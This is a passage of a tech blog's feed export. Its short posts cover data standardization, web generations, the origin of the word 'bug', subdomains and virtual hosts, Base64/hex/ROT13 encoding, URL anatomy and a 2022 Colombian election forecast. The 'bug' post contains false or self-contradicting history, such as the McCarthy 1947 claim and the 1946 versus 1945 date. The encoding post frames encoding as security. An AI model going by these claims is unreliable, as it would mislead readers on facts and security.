src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/Captura-de-Pantalla-2022-08-22-a-la-s--7.07.46-p.-m..png" class="kg-image" alt="Why is it important to standardize datasets?"/></figure><p/><figure class="kg-card kg-image-card"><img src="https://res-4.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/scaled-data-1-.png" class="kg-image" alt="Why is it important to standardize datasets?"/></figure><p>Let’s see some of the benefits of standardizing:</p><h1 id="accuracy">Accuracy</h1><p>Standardizing allows for more accurate comparisons between data points. If two data points are on different scales, it can be difficult to tell if they are actually different from each other or if the difference is just due to the scale. Standardizing the data eliminates this issue.</p><h1 id="performance-of-machine-learning-algorithms">Performance of machine learning algorithms</h1><p>Another reason why standardization is important is that it can help improve the performance of machine learning algorithms. Many machine learning algorithms are based on gradient descent, and they require that all features be on a similar scale in order to work properly. If the features are not standardized, the algorithm may have a hard time converging on a solution.</p><h1 id="avoiding-outliers">Avoiding Outliers</h1><p>Finally, standardization can also help to reduce the amount of noise in the data. If there are a lot of outliers in the data, they can have a significant impact on the results of any analyses that are performed. Standardizing the data can help to filter out some of the noise and make the results more reliable.</p><hr><p>We hope this post gave you some insights into the popular concept of standardizing datasets in data science and its many benefits.</p><p>Check out this post in:<br>Medium: <a href="https://medium.com/@artofcode_/why-is-it-important-to-standardize-datasets-f94545786d14">https://medium.com/@artofcode_/why-is-it-important-to-standardize-datasets-f94545786d14</a></br></p><p>Dev.to: <a href="https://dev.to/christianpaez/why-is-it-important-to-standardize-datasets-55md">https://dev.to/christianpaez/why-is-it-important-to-standardize-datasets-55md</a></p><p>Image credit: <a href="https://unsplash.com/@mbaumi">https://unsplash.com/@mbaumi</a></p></hr></hr>]]></content:encoded></item><item><title><![CDATA[Web 1.0 vs 2.0 vs 3.0.]]></title><description><![CDATA[When talking about Web standards, usually the different Web generations are brought up, what do they actually mean?, most of us are used to browsing on the web and using websites, but we do not understand these terms; let’s see some basic definitions.]]></description><link>https://artofcode.tech/web-1-0-vs-2-0-vs-3-0</link><guid isPermaLink="false">Ghost__Post__62f822a72fffc9001dae8cc6</guid><category><![CDATA[blog]]></category><category><![CDATA[history]]></category><category><![CDATA[web]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sat, 13 Aug 2022 22:21:15 GMT</pubDate><media:content url="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/denny-muller-JySoEnr-eOg-unsplash.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/denny-muller-JySoEnr-eOg-unsplash.jpg" alt="Web 1.0 vs 2.0 vs 3.0."/><p>When talking about Web standards, usually the different Web generations are brought up, what do they actually mean?, most of us are used to browsing on the web and using websites, but we do not understand these terms; let’s see some basic definitions.</p><hr><h2 id="web-1-0-">Web 1.0.</h2><p>Web 1.0 sites were important because they were the first generation of the World Wide Web, and they paved the way for the development of subsequent generations of the Internet. This era of the World Wide Web was defined by static HTML pages that were manually created and updated. Some problems with the firsts websites include the fact that sites were static and required manual updates, which made it difficult to keep content fresh. Additionally, because HTML was the only language used to create Web 1.0 sites, they were not very interactive or user-friendly. <br>Some Web 1.0 examples include Geocities, Tripod, and Angelfire.</br></p><h2 id="web-2-0-">Web 2.0.</h2><p>We can say that for a long time, we have been immersed deeply into the second generation of the web. Web 2.0. This generation was defined by dynamic web applications that were powered by databases. Compared to the Web 1.0 sites, these new sites were different because they allowed for dynamic content that could be updated in real-time. Some problems that came up at first included the fact that many sites were reliant on Flash, which made them inaccessible for mobile devices; later HTML5 and JavaScript were heavily adopted but some compatibility issues between browsers and devices remained. Additionally, because Web 2.0 sites were powered by databases, they were often complex and difficult to use. <br>Some Web 2.0 examples include Facebook, Twitter, and LinkedIn.</br></p><h2 id="web-3-0-">Web 3.0.</h2><p>There is no precise definition for this since this generation is in its early stages but it’s generally said that new applications will be more decentralized and reliant on blockchain technologies, thus giving users more control over their data and removing central authorities that can take advantage of data users provide and or regulate information users consume. Some of the issues encountered in this generation of websites have been lack of standards, lack of adoption, and general complexity. <br>Web 3.0 Examples include IPFS, Smart Contracts and Cryptocurrencies.</br></p><hr><p>We need to care about web standards because they help ensure that the web is accessible to everyone, regardless of their device or browser. Additionally, web standards help make the web more efficient and easier to use. We hope that this post can give you a general idea of the different eras of the modern Web.</p><p>Check out this post in:<br>Medium: <a href="https://medium.com/@artofcode_/web-1-0-vs-2-0-vs-3-0-cca6ebcb036">https://medium.com/@artofcode_/web-1-0-vs-2-0-vs-3-0-cca6ebcb036</a><br>Dev.to: <a href="https://dev.to/christianpaez/web-10-vs-20-vs-30-416f">https://dev.to/christianpaez/web-10-vs-20-vs-30-416f</a></br></br></p><p>Image credit: Denny Müller on Unplash.</p></hr></hr>]]></content:encoded></item><item><title><![CDATA[Why are Software bugs named bugs?]]></title><description><![CDATA[The use of the term "bug" to describe problems with software is now common and is used in both technical and non-technical contexts. What are the origins of the term?, Does it refer to a real insect?, Let’s check some historical facts.]]></description><link>https://artofcode.tech/why-are-software-bugs-named-bugs</link><guid isPermaLink="false">Ghost__Post__62eaef5626aa9c001db99d60</guid><category><![CDATA[blog]]></category><category><![CDATA[software]]></category><category><![CDATA[bugs]]></category><category><![CDATA[errors]]></category><category><![CDATA[history]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Wed, 03 Aug 2022 22:00:31 GMT</pubDate><media:content url="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/lucky-charm-g0c899cbac_1920.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/lucky-charm-g0c899cbac_1920.jpg" alt="Why are Software bugs named bugs?"/><p/><p>The use of the term "bug" to describe problems with software is now common and is used in both technical and non-technical contexts. What are the origins of the term?, Does it refer to a real insect?, Let’s check some historical facts.</p><h1 id="thomas-edison">Thomas Edison</h1><p>The term "bug" in software is derived from the term "bug" in insects. The first recorded use of the term "bug" to describe a problem with a machine was in 1878, when Thomas Edison used it to describe a problem with one of his phonographs.</p><h1 id="radio-engineering">Radio Engineering</h1><p>The term "bug" was also used to describe problems with mechanical devices in the early days of radio. In an article in the Proceedings of the Institute of Radio Engineers in June of 1920, E. J. Stone described a problem with a receiver caused by a "<em>bug"</em> in the wiring.</p><h1 id="grace-hopper"><strong>Grace Hopper</strong></h1><p>In 1946, when Hopper was working on the electromechanical computer <strong><code>Harvard Mark II</code></strong>, operators traced an error to a moth rapped in a relay, coining the term "<em>bug".</em> This bug was carefully removed and taped to the log book. This log book, complete with attached moth, is part of the collection of the Smithsonian National Museum of American History.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://res-4.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/First_Computer_Bug-_1945.jpg" class="kg-image" alt="Why are Software bugs named bugs?"><figcaption>Original page from the Mark II Iog book.</figcaption></img></figure><h1 id="john-mccarthy"><strong>John McCarthy</strong></h1><p>In an article in the Harvard University Computing Center Newsletter in October of 1947, John McCarthy, the father of artificial intelligence, described a problem with a computer program as a "bug."</p><hr><p>Hopefully, these historical facts remind you that software terminology is interesting because it is ever-changing and constantly evolving. As new software is created, new terminology is born.</p><p>Check out this post on:<br>Medium:<a href="https://medium.com/@artofcode_/why-are-software-bugs-named-bugs-5c652106c30">https://medium.com/@artofcode_/why-are-software-bugs-named-bugs-5c652106c30</a></br></p><p>Dev.to: <a href="https://dev.to/christianpaez/why-are-software-bugs-named-bugs-ol0">https://dev.to/christianpaez/why-are-software-bugs-named-bugs-ol0</a></p></hr>]]></content:encoded></item><item><title><![CDATA[Subdomains vs. Virtual Hosts]]></title><description><![CDATA[The difference between sub-domains and VHosts is important to understand because it can affect the way your website is accessed and how search engines index your website.]]></description><link>https://artofcode.tech/subdomains-vs-virtual-hosts</link><guid isPermaLink="false">Ghost__Post__62dd8780f7df3c001d301974</guid><category><![CDATA[blog]]></category><category><![CDATA[web]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sun, 24 Jul 2022 18:00:32 GMT</pubDate><media:content url="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/stephen-phillips-hostreviews-co-uk-2kH-6T6x_0I-unsplash.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/stephen-phillips-hostreviews-co-uk-2kH-6T6x_0I-unsplash.jpg" alt="Subdomains vs. Virtual Hosts"/><p>The difference between sub-domains and VHosts is important to understand because it can affect the way your website is accessed and how search engines index your website. If you are not using the correct type of hosting, it can also affect the speed and performance of your website and even be vulnerable to cybersecurity vulnerabilities like DNS hijacking, SSL certificate vulnerabilities, and cross-site scripting.</p><h1 id="subdomain">Subdomain</h1><p>A sub-domain is a second-level domain that is part of a larger domain. For example, if you have a website at <code>example.com</code>, you can create a subdomain at <code>subdomain.example.com</code>. A subdomain can be used to create a separate website, or it can be used to point to a different website or directory on the same server.</p><h1 id="virtual-host">Virtual Host</h1><p>A Virtual Host (VH) is an Internet hosting service that allows organizations to host their websites on a single server. A VH can be used to host multiple websites, each with its own domain name, or it can be used to host multiple websites that share the same domain name. VHosts may or may not have public DNS records, so in order to access your site, you may need to change host names and addresses on your localhost (typically located in <code>etc/hosts</code>) or use the <code>Host:</code> header of a standard HTTP request. </p><hr><p>In conclusion, it is important to understand the difference between sub-domains and VHosts in order to ensure that your website is accessible and performing optimally.</p><p>Check out this post on:<br>Medium: <a href="https://medium.com/@artofcode_/subdomains-vs-virtual-hosts-8b6afb9dc0d0">https://medium.com/@artofcode_/subdomains-vs-virtual-hosts-8b6afb9dc0d0</a><br>Dev.to: <a href="https://dev.to/christianpaez/subdomains-vs-virtual-hosts-2e71">https://dev.to/christianpaez/subdomains-vs-virtual-hosts-2e71</a></br></br></p></hr>]]></content:encoded></item><item><title><![CDATA[Common Encoding and Decoding systems]]></title><description><![CDATA[Sometimes data cannot be stored or presented in plain text due to security reasons. Let’s see some of the most common encoding and decoding systems used nowadays.]]></description><link>https://artofcode.tech/common-encoding-and-decoding-systems</link><guid isPermaLink="false">Ghost__Post__62c51fa5d3e9f4001db56f06</guid><category><![CDATA[web]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Wed, 06 Jul 2022 05:39:45 GMT</pubDate><media:content url="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/markus-spiske-iar-afB0QQw-unsplash.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/markus-spiske-iar-afB0QQw-unsplash.jpg" alt="Common Encoding and Decoding systems"/><p>Sometimes data cannot be stored or presented in plain text due to security reasons. For this, it is very common to use encoding systems; this consists of taking a piece of data like a letter or word and converting it into symbols that looks unreadable. Decoding is the opposite process, taking the encoded symbols and converting them back into something that’s human readable. Let’s see some of the most common encoding and decoding systems used nowadays.</p><h1 id="base64">Base64</h1><p>The idea behind this encoding is to use 64 characters that are common across encoding systems and are also printable, most common base64 variations use alphanumeric characters (<code>A-Z</code>, <code>a-z</code>, <code>0-9</code>) for the first 62 values and some combination of a plus sign (<code>+</code>), a forward slash (<code>/</code>)for the last 2 characters and perhaps an equal sign (<code>=</code>) for padding.</p><h2 id="example">Example</h2><p>Original: <code>hello world</code></p><p>Base64: <code>aGVsbG8gd29ybGQ=</code></p><h1 id="hex-base-16-">Hex (Base 16)</h1><p>In this system, data is encoded in 4-bit sequences using 16 symbols from the ASCII character set, most commonly used characters are letters <code>A</code> to <code>F</code> (sometimes lowercase <code>a-f</code>) and the Arabic numerals or digits <code>0-9</code>.</p><h2 id="example-1">Example</h2><p>Original: <code>hello world</code></p><p>Hex (Base16): <code>68656c6c6f20776f726c640a</code></p><h1 id="rot13-caesar-cypher-">ROT13 (Caesar Cypher)</h1><p>More of a simple substitution shift that consists of taking an alphabet letter and replacing it with a letter 13 positions down the alphabet (other numbers of positions can be used); this is also known as the Caesar Cypher since it was used by Julius Caesar in his private correspondence in ancient Rome.</p><h2 id="example-2">Example</h2><p>Original: <code>hello world</code></p><p>ROT13: <code>uryyb jbeyq</code></p><p>These encodings are commonly used in web development, cryptography, and email encryption. We hope this post can provide a basic understanding of these encodings and how they transform data.</p><p>Check out this post on:<br>Medium: <a href="https://medium.com/@artofcode_/common-encoding-and-decoding-systems-10d5c5a1f2d9">https://medium.com/@artofcode_/common-encoding-and-decoding-systems-10d5c5a1f2d9</a><br>Dev.to: <a href="https://dev.to/christianpaez/common-encoding-and-decoding-systems-1d02">https://dev.to/christianpaez/common-encoding-and-decoding-systems-1d02</a></br></br></p>]]></content:encoded></item><item><title><![CDATA[How is a URL structured?]]></title><description><![CDATA[A web server interprets a URL (Uniform Resource Locator) to locate a resource. In this short writing we will learn how a URL is structured and interpreted.]]></description><link>http://localhost:8000/how-is-a-url-structured/</link><guid isPermaLink="false">Ghost__Post__62b50829212814001db45fc9</guid><category><![CDATA[blog]]></category><category><![CDATA[web]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Fri, 24 Jun 2022 00:57:00 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1617854818583-09e7f077a156?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=MnwxMTc3M3wwfDF8c2VhcmNofDF8fHVybHxlbnwwfHx8fDE2NTYwMzIxNzI&ixlib=rb-1.2.1&q=80&w=2000" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1617854818583-09e7f077a156?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=MnwxMTc3M3wwfDF8c2VhcmNofDF8fHVybHxlbnwwfHx8fDE2NTYwMzIxNzI&ixlib=rb-1.2.1&q=80&w=2000" alt="How is a URL structured?"/><p>A huge part of modern software is related to web technologies, mostly done by a web server interpreting a URL (Uniform Resource Locator) to locate a resource. In this short writing we will learn how a URL is structured and interpreted.</p><hr><h3 id="url-example">URL Example</h3><p><a href="https://example.com:443/path/file.html?key1=value1&key2=value2#SomeLocationInDocument"><code>https://example.com:443/path/file.html?key1=value1&key2=value2#SomeLocationInDocument</code></a></p><p>A URL like this one is divided into multiple components:</p><h2 id="scheme-required-">Scheme (Required)</h2><figure class="kg-card kg-image-card"><img src="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/URL-7-.png" class="kg-image" alt="How is a URL structured?"/></figure><p>Indicates the protocol that has to be used to request the resource, can be either https (With SSL/Secure) or http (Without SSL/Unsecure).</p><h2 id="user-optional-">User (Optional)</h2><figure class="kg-card kg-image-card"><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/URL-1-.png" class="kg-image" alt="How is a URL structured?"/></figure><p>Used for HTTP Basic Authentication, currently deprecated since it is prone to security flaws, is written in the form <code>user:password</code> followed by an <code>@</code> sign.</p><h2 id="host-required-">Host (Required)</h2><figure class="kg-card kg-image-card"><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/URL-2-.png" class="kg-image" alt="How is a URL structured?"/></figure><p>This is the resource location, could be an IP address (e.g., <strong>192.0.2.146</strong>) or a host name (e.g., <a href="http://example.com">example.com</a>). a host name can include a subdomain followed by a dot <code>.</code> before the domain name (i.e., <a href="http://subdomain.example.com">subdomain.example.com</a>) and has to include a top-level domain (e.g., .com).</p><h2 id="port-optional-">Port (Optional)</h2><figure class="kg-card kg-image-card"><img src="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/URL-3-.png" class="kg-image" alt="How is a URL structured?"/></figure><p>This number indicates the web server port number we want to connect to, denoted after the host and preceded by colon <code>:</code> defaults to 443 for https and 80 to http.</p><h2 id="path-directory-optional-">Path/Directory (Optional)</h2><figure class="kg-card kg-image-card"><img src="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/URL-4-.png" class="kg-image" alt="How is a URL structured?"/></figure><p>Points to the resource we want to access, can be a file or a folder; all web applications have a default path, usually <code>index.html</code>.</p><h2 id="query-string-optional-">Query String (Optional)</h2><figure class="kg-card kg-image-card"><img src="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/URL-5-.png" class="kg-image" alt="How is a URL structured?"/></figure><p>These are extra parameters sent to the web server, starts with a question mark <code>?</code></p><p>followed by one or many key value pairs in the form <code>key=value</code>.</p><h2 id="fragment-anchor-optional-">Fragment/Anchor (Optional)</h2><figure class="kg-card kg-image-card"><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/URL-8-.png" class="kg-image" alt="How is a URL structured?"/></figure><p>This is used by the locate sections within the document displayed by the browser; this value is only processed on the client.</p><p>As you can see, there is a lot going on in a URL string, we hope this short writing can provide useful info as to what these values mean.</p><p>Check this post on:</p><p>Dev.to: <a href="https://dev.to/christianpaez/how-is-a-url-structured-4jkl">https://dev.to/christianpaez/how-is-a-url-structured-4jkl</a></p><p>Medium: <a href="https://medium.com/@artofcode_/how-is-a-url-structured-3186015a8287">https://medium.com/@artofcode_/how-is-a-url-structured-3186015a8287</a></p></hr>]]></content:encoded></item><item><title><![CDATA[Who will win the 2022 Colombian Election?, according to statistics.]]></title><description><![CDATA[Many news outlets have run opinion polls on presidential candidates; what does this data tell us about a possible winner?.]]></description><link>http://localhost:8000/who-will-win-the-2022-colombian-election-according-to-statistics/</link><guid isPermaLink="false">Ghost__Post__629fcddb2afbf8001dd19df1</guid><category><![CDATA[blog]]></category><category><![CDATA[datascience]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Wed, 08 Jun 2022 02:37:44 GMT</pubDate><media:content url="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/arnaud-jaegers-IBWJsMObnnU-unsplash.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/arnaud-jaegers-IBWJsMObnnU-unsplash.jpg" alt="Who will win the 2022 Colombian Election?, according to statistics."/><p>In about a week, A new President will be elected to lead the Republic of Colombia, since this has become a popular topic in the media, many news outlets have run opinion polls on presidential candidates; what does this data tell us about a possible winner?.</p><h3 id="does-polling-data-provide-useful-insights">Does polling data provide useful insights?<br/></h3><p>The short answer is, yes. Thanks to public polling data, we can build a statistical model that gives us the probability of a candidate winning the second round of the election. However, there are some caveats:</p><h3 id="polling-variability">Polling Variability</h3><p>When we build our prediction model, we need to take into account possible variability in the collected data; this can happen for many reasons:</p><ul><li>People lie in polls.</li><li>People's opinions change over time.</li><li>Voting and polled population may differ.</li><li>Pollster Bias.</li></ul><p>Despite these problems, we can still construct an effective model to predict a winner.</p><h3 id="how-was-this-model-built-despite-polling-data-issues">How was this model built, despite polling data issues?</h3><p>All of these flaws found in polling data are interpreted as <em>variability</em> in our model, which works perfectly because we want to predict who will win, not precisely the number or percentage of votes, previous election data is also available to use as reference in order to tell what is the expected behavior of poll data vs election results and how bigger is the percentage of votes obtained by the election winner.<br/></p><h3 id="check-out-our-current-forecast-here-https-artofcode-tech-2022-colombian-election-forecast-">Check out our current forecast here: <br><a href="https://artofcode.tech/2022-colombian-election-forecast/">https://artofcode.tech/2022-colombian-election-forecast/</a></br></h3><p/><h3 id="how-to-interpret-this-model">How to interpret this model?</h3><p>Currently, it's a tossup. One candidate has a higher probability of winning, but a victory is not certain, in statistics we are often certain about an event if we see a 95% probability of it happening, this is not the case here; similar scenarios have been seen in other elections like the USA 2016 Election, a model very similar to this one predicted a win for Hillary Clinton with a 71% probability, however, she lost the election; it is true that she had a higher percentage of winning but unless we see a probability of over 90% of winning, it's hard to be certain about a clear victory.</p><h3 id="conclusion">Conclusion</h3><p>Statistics and Data Science are very useful to predict results given polling data, however, it seems that many popular news outlets have problems when interpreting these numbers since it is becoming a popular sentiment among the general public that polls do not provide useful information or are rigged, hopefully here you can a find a more realistic assessment of the meaning of opinion polling results and we invite you to check our current forecast, we update it as often as we can.</p><h3 id="references-">References:</h3><p>Forecast: <a href="https://artofcode.tech/2022-colombian-election-forecast/">https://artofcode.tech/2022-colombian-election-forecast/</a><br>Github: <a href="https://github.com/christianpaez/colombian-election-analysis-2022">https://github.com/christianpaez/colombian-election-analysis-2022</a></br></p>]]></content:encoded></item><item><title><![CDATA[2022 Colombian Election Forecast]]></title><description><![CDATA[Gustavo Petro has a 59% chance of winning the 2022 presidential election(Second Round).]]></description><link>http://localhost:8000/2022-colombian-election-forecast/</link><guid isPermaLink="false">Ghost__Post__627c60860b864d001d362f70</guid><category><![CDATA[Projects]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Thu, 12 May 2022 01:23:13 GMT</pubDate><media:content url="https://res-4.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/isaac-smith-6EnTPvPPL6I-unsplash.jpg" medium="image"/><content:encoded><![CDATA[<!--kg-card-begin: html--><body>
<h1 class="title toc-ignore">Gustavo Petro has a 59% chance of winning the 2022 presidential election(Second Round)</h1>
<h4 class="author">By: Christian Páez</h4>
<h4 class="date">Last updated: 2022-06-14(Ended)</h4>
<img src="https://res-4.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/isaac-smith-6EnTPvPPL6I-unsplash.jpg" alt="2022 Colombian Election Forecast"/><p>This statistical model attempts to make a probabilistic statement about Gustavo Petro’s chances of winning the 2022 Colombian Presidential Election(Second round), this was accomplished using public polling data, statistical inference, the Bayes theorem and some analysis of previous elections.</p>
<div id="section" class="section level2">
<h2/>
<p><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAqAAAAEgCAYAAABrZMGAAAAEGWlDQ1BrQ0dDb2xvclNwYWNlR2VuZXJpY1JHQgAAOI2NVV1oHFUUPrtzZyMkzlNsNIV0qD8NJQ2TVjShtLp/3d02bpZJNtoi6GT27s6Yyc44M7v9oU9FUHwx6psUxL+3gCAo9Q/bPrQvlQol2tQgKD60+INQ6Ium65k7M5lpurHeZe58853vnnvuuWfvBei5qliWkRQBFpquLRcy4nOHj4g9K5CEh6AXBqFXUR0rXalMAjZPC3e1W99Dwntf2dXd/p+tt0YdFSBxH2Kz5qgLiI8B8KdVy3YBevqRHz/qWh72Yui3MUDEL3q44WPXw3M+fo1pZuQs4tOIBVVTaoiXEI/MxfhGDPsxsNZfoE1q66ro5aJim3XdoLFw72H+n23BaIXzbcOnz5mfPoTvYVz7KzUl5+FRxEuqkp9G/Ajia219thzg25abkRE/BpDc3pqvphHvRFys2weqvp+krbWKIX7nhDbzLOItiM8358pTwdirqpPFnMF2xLc1WvLyOwTAibpbmvHHcvttU57y5+XqNZrLe3lE/Pq8eUj2fXKfOe3pfOjzhJYtB/yll5SDFcSDiH+hRkH25+L+sdxKEAMZahrlSX8ukqMOWy/jXW2m6M9LDBc31B9LFuv6gVKg/0Szi3KAr1kGq1GMjU/aLbnq6/lRxc4XfJ98hTargX++DbMJBSiYMIe9Ck1YAxFkKEAG3xbYaKmDDgYyFK0UGYpfoWYXG+fAPPI6tJnNwb7ClP7IyF+D+bjOtCpkhz6CFrIa/I6sFtNl8auFXGMTP34sNwI/JhkgEtmDz14ySfaRcTIBInmKPE32kxyyE2Tv+thKbEVePDfW/byMM1Kmm0XdObS7oGD/MypMXFPXrCwOtoYjyyn7BV29/MZfsVzpLDdRtuIZnbpXzvlf+ev8MvYr/Gqk4H/kV/G3csdazLuyTMPsbFhzd1UabQbjFvDRmcWJxR3zcfHkVw9GfpbJmeev9F08WW8uDkaslwX6avlWGU6NRKz0g/SHtCy9J30o/ca9zX3Kfc19zn3BXQKRO8ud477hLnAfc1/G9mrzGlrfexZ5GLdn6ZZrrEohI2wVHhZywjbhUWEy8icMCGNCUdiBlq3r+xafL549HQ5jH+an+1y+LlYBifuxAvRN/lVVVOlwlCkdVm9NOL5BE4wkQ2SMlDZU97hX86EilU/lUmkQUztTE6mx1EEPh7OmdqBtAvv8HdWpbrJS6tJj3n0CWdM6busNzRV3S9KTYhqvNiqWmuroiKgYhshMjmhTh9ptWhsF7970j/SbMrsPE1suR5z7DMC+P/Hs+y7ijrQAlhyAgccjbhjPygfeBTjzhNqy28EdkUh8C+DU9+z2v/oyeH791OncxHOs5y2AtTc7nb/f73TWPkD/qwBnjX8BoJ98VQNcC+8AAEAASURBVHgB7Z0HmBTF1obPBthll5yzICCoCCqioqKYBRUzKoI5YrjmnP0N95oVRcGMmEUEEQOKAVREFAkikrPkHJYN/ddXUmNP78xsze7spP7qYZnu6krnreqZ06dOVWc4KggDCZAACZAACZAACZAACcSJQGac6mE1JEACJEACJEACJEACJKAJUAHlQCABEiABEiABEiABEogrASqgccXNykiABEiABEiABEiABKiAcgyQAAmQAAmQAAmQAAnElQAV0LjiZmUkQAIkQAIkQAIkQAJUQDkGSIAESIAESIAESIAE4koguzy1ff/99/L555/L33//La1bt5Y+ffpIu3btShW1du1aGTlypPzyyy+y7777ymmnnSa1atUqlc6mvI0bN8rrr78uM2fOlJycHNlvv/3krLPOkqysrFLlhYooLCyUiRMnyrfffivfffedZGRkSMeOHeWqq66SVq1ahcoSMe7HH3+U1157Te655x5p2rRpxLSxuDhp0iR56aWX5I477pCWLVuGLfLXX3+VF198UW699VbdN2ETxvDC0KFDZfz48RFLPPHEE+WEE06Qyua2evVqqV+/fqAt9913n9StW1euvvrqQFw8DubNmydvvvmmTJkyRXAf7LXXXnLAAQfIOeeco8dePNoQ6zqKi4tlwIAB0qtXLznppJPCFv/GG2/IhAkTSl3Pzc2Vhg0byjHHHCNdu3YtdT0ZIsqSceHChfLQQw9J79695fjjjw9q8uzZs+Wxxx6TvLw8efLJJ4Ou4QRjEQHfGYkal7oB/I8ESIAEkoEA9gGNJvznP//BvqFOnTp1nKOPPtqpWrWqoxRCZ9iwYUHFKEXDqVKlirPbbrs5SvFwatas6XTq1MlRSmtQOpvy/vzzT0f9cOl6DzzwQKdt27b6eP/993e2bNkSVF6ok+3btztHHXWUzpOfn++oH1BHKZ/6HG1USmmobBHjlPKp80+bNi1iulhdfOutt3R9kydPjljk+++/r9P99NNPEdPF8uLFF1+s61SKuNO8efOQf0888YSusjK5ffzxx45SPoNE23PPPZ3jjjsuKK6yT9TDmb4/atSo4RxxxBF67FWrVk0zUoqLox6mKrsJlVL+jh07tAzqIShi+RdeeKFOpx46HfWgGPhr0KCBjlcPjc4zzzwTsYxEXSxLRnyXoC9POeWUUk18+OGHtXz4fvzjjz+Crm/atMnJzs52LrroIh2fiHEZ1CCekAAJkECCCUg09X/11Vf6C/ayyy5z8EWMoKw7TufOnZ3q1as7a9as0XEFBQXOHnvsoX/4leVRx82aNctRligHP04m2JbXvXt3/aXv/lJ/5ZVXdFtuv/12U1zIT/ygQAHGj94777wTaDcSz50712nWrJlWaG0UWXcFlalIuesxx7YK6Pr1653ff//d2bp1q8la6Z9GAUXdZYXK5HbdddfpH3l3GzDulDXSHVXpx7vssotWwnFvmLBt2zZHWb30mL3//vtNdEp9lqWcGWGMAgqlyx1KSkocZcnX95uagSj1MOpOm6hjGxnx4N2oUaNSTTzssMOcY489Vn/XmAcukwgPJVBM3333XR2ViHFp2sJPEiABEkgGAlH5gI4ePVobba+99lo9DY4TZQnV09ibN28WZZ3T15WiJ0pZlBtuuEHUU7+OU5ZQPf349ttvi1JUdJxNeRs2bNDTeZjy23333XU+/HfeeedJixYt5JtvvgnEhToYNGiQfPLJJ3LvvffKmWeeGWg30u66664ycOBAmTNnjijrRVB29UMkv/32m4wZM0YWLFgQdC3SyfLly+XLL7/U0/1KqS2VdOnSpbJu3Todj3K//vprATsTkGfcuHF62tbEeT+Rf+zYsdodQf2oB11WFl1R1uZSrgnqoUCmT58uYI5pYaWgBuVzt2vRokXaxSIauYMKK8cJpj4xZj777LOIvNEvmO6fP39+UC0rV64UuGkgoN2GsXow0lOiQYnVSaR+Qh+gDHWDCrj98MMP+s/LzFsmzjENi2laZenS94ZJg+nnm2++WZo0aaL7wMSbT0zTo9+V5bpU35g0+Awnv0lT1riNVjYz1sC3ogFuL3CdUbMemi3GsDuU1XbcJ+gXuNO4A75PEG9CtGM5WhnVbIqsWLFCf2+YOpWyrcfIqaeeKmpmRn9vmGv4hNtPZmamIC+Cd1zattk2Heoo655yjwV8N0ydOhXZGEiABEggPgSi0YJhzVRfgKWy3Hnnnfrp/ueff9bXLr/8cm0FUF+AQWlHjBih0yn/MB1vW576gXC81jWlmDrK10pPpwdV4jlR/qlO7dq1HW9b3MmUAurAOmPCF1984Si/UN1WWE5VT+hp1MWLF5skjteSB4sjLD+w7Jg8mIIdPHhwIA8OlBLtKD86p2fPnrpclI2puVGjRjnvvfeedmlAHFwblMLsFBUV6fzGAqqUekcpMzoP0mGa023hCzUFr3xnNQOkVz+Cul5MVX/66aeBtpl2YWoR6cyf8ll0jBU7kNhzUFELKNwKOnTooOs07DBt7nXXuPHGG7Ul3KRRfpUO+gpBPaAE2oy2K2VPx3unOm36CVYqlDF8+HAHfWhYYAq5LHcNzAxgXO69996BGQHdkJ3/wRLqDkrpcpS/ru4X9A3GD9xVlB+lO5k+jiQ/EtiMW1vZ0OdKmdJj2fA297ntFLzXAmoE+t///qeZGmugbdu995wpD7Mg6CPMvCDYjuXyyojxivpeffVVXR/+++ijj3ScejBy1MOudktSCl7g+iGHHOIov9fAuXdc2rbZNp3NPaV8lHWbn3vuOf0JmZLVNSIAjgckQAJp